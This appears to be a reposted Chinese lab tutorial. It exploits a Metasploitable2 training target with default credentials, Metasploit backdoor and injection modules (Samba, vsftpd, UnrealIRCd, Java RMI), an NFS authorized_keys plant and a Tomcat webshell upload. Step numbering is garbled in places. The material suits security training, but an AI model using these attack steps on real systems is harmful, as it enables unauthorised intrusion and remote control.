本文共 2403 字，大约阅读时间需要 8 分钟。

Metasploit 攻击演示环境

##靶机信息靶机：Metasploitable2-Linux

##攻击演示系统操作系统：Kali Linux 1.0.9

##漏洞一：弱密码漏洞

###漏洞分析

• 弱密码漏洞指系统或数据库的登录用户密码过于简单或用户名与密码相同，易被暴力破解获取。

###攻击步骤

telnet 192.168.160.131

2. 输入登录名和密码，常见弱密码包括：msfadmin/msfadmin、user/user、postgres/postgres、sys/batman等。

###测试结果

• 输入“msfadmin/msfadmin”成功登录系统，进入命令终端。
• 输入“user/user”也可成功登录。

###注意事项

• 需要尝试多次不同的弱密码组合，确保找到有效的登录账号。

---

##漏洞二：MySQL弱密码漏洞

###漏洞分析

• MySQL数据库弱密码漏洞指数据库配置使用简单或已知的密码，易被破解。

###攻击步骤

3. 在Kali中执行以下命令：

mysql -h 192.168.160.131 -u root

2. 输入MySQL根密码，登录成功后检查数据库状态。

###测试结果

• 成功登录MySQL系统，查看数据库表结构和用户权限。

---

##漏洞三：PostgreSQL弱密码漏洞

###漏洞分析

• PostgreSQL数据库弱密码漏洞指数据库配置使用简单或已知的密码，易被破解。

###攻击步骤

3. 在Kali中执行以下命令：

psql -h 192.168.160.131 -U postgres

2. 输入密码“postgres”，登录成功后查看数据库状态。

###测试结果

• 成功登录PostgreSQL系统，查看数据库表结构和用户权限。

---

##漏洞四：VNC弱密码漏洞

###漏洞分析

• VNC远程控制软件使用简单或已知的密码，易被破解。

###攻击步骤

3. 在Kali的图形界面终端中执行以下命令：

vncviewer 192.168.160.131

2. 输入密码“password”，登录成功后可远程控制靶机。

###测试结果

• 成功登录VNC界面，获取靶机的远程控制权限。

---

##漏洞五：Samba MS-RPC Shell命令注入漏洞

###漏洞分析

• Samba服务器配置问题允许远程用户通过MS-RPC注入命令，执行恶意操作。

###攻击步骤

3. 在Kali中启动Metasploit：

msfconsole

2. 使用漏洞模块：

use exploit/multi/samba/usermap_script

3. 设置目标IP：

set RHOST 192.168.160.131

4. 开始攻击：

exploit

###测试结果

• 成功利用漏洞，执行命令如uname -a验证系统信息。

---

##漏洞六：Vsftpd源码包后门漏洞

###漏洞分析

• Vsftpd服务器特定版本存在后门漏洞，允许远程执行恶意代码。

###攻击步骤

5. 在Kali中启动Metasploit：

msfconsole

2. 使用漏洞模块：

use exploit/unix/ftp/vsftpd_234_backdoor

3. 设置目标IP：

set RHOST 192.168.160.131

4. 开始攻击：

run

###测试结果

• 成功获取靶机的终端控制权限。

---

##漏洞七：UnreallRCd后门漏洞

###漏洞分析

• UnrealIRCd服务器存在后门漏洞，允许远程执行任意命令。

###攻击步骤

5. 在Kali中启动Metasploit：

msfconsole

2. 使用漏洞模块：

use exploit/unix/irc/unreal_ircd_3281_backdoor

3. 设置目标IP：

set RHOST 192.168.160.131

4. 开始攻击：

run

###测试结果

• 成功获取靶机的终端控制权限。

---

##漏洞八：Linux NFS共享目录配置漏洞

###漏洞分析

• NFS共享目录配置漏洞允许攻击者修改/root/.ssh/authorized_keys，实现无密码登录。

###攻击步骤

5. 验证NFS服务状态：

rpcinfo -p 192.168.160.131

2. 查看共享目录：

showmount -e 192.168.160.131

3. 生成SSH公钥并上传：

ssh-keygen

4. 将公钥添加到靶机：

cat /root/.ssh/id_rsa.pub > /tmp/t00l/root/.ssh/authorized_keys

###测试结果

• 成功实现无密码SSH登录。

---

##漏洞九：Java RMI SERVER命令执行漏洞

###漏洞分析

• Java RMI Server的默认配置存在漏洞，允许远程执行命令。

###攻击步骤

5. 扫描目标端口：

nmap -p 1099 192.168.160.131

2. 使用Metasploit漏洞模块：

use exploit/multi/misc/java_rmi_server

3. 设置目标IP：

set RHOST 192.168.160.131

4. 开始攻击：

run

###测试结果

• 成功执行远程命令，获取靶机控制权限。

---

##漏洞十：Tomcat管理台默认口令漏洞

###漏洞分析

• Tomcat管理台默认账户易被破解，攻击者可部署WebShell。

###攻击步骤

5. 访问Tomcat管理台：

http://192.168.160.131:8180

2. 输入默认账户“tomcat/tomcat”登录。
3. 准备JSP webshell文件（如liuz.jsp），将其部署到Tomcat应用目录下。

###测试结果

• 成功登录Tomcat管理台，部署并访问WebShell，获取远程控制权限。

---

通过以上步骤，可以对靶机进行多种攻击方式，测试系统的安全性。

转载地址：http://yxwj.baihongyu.com/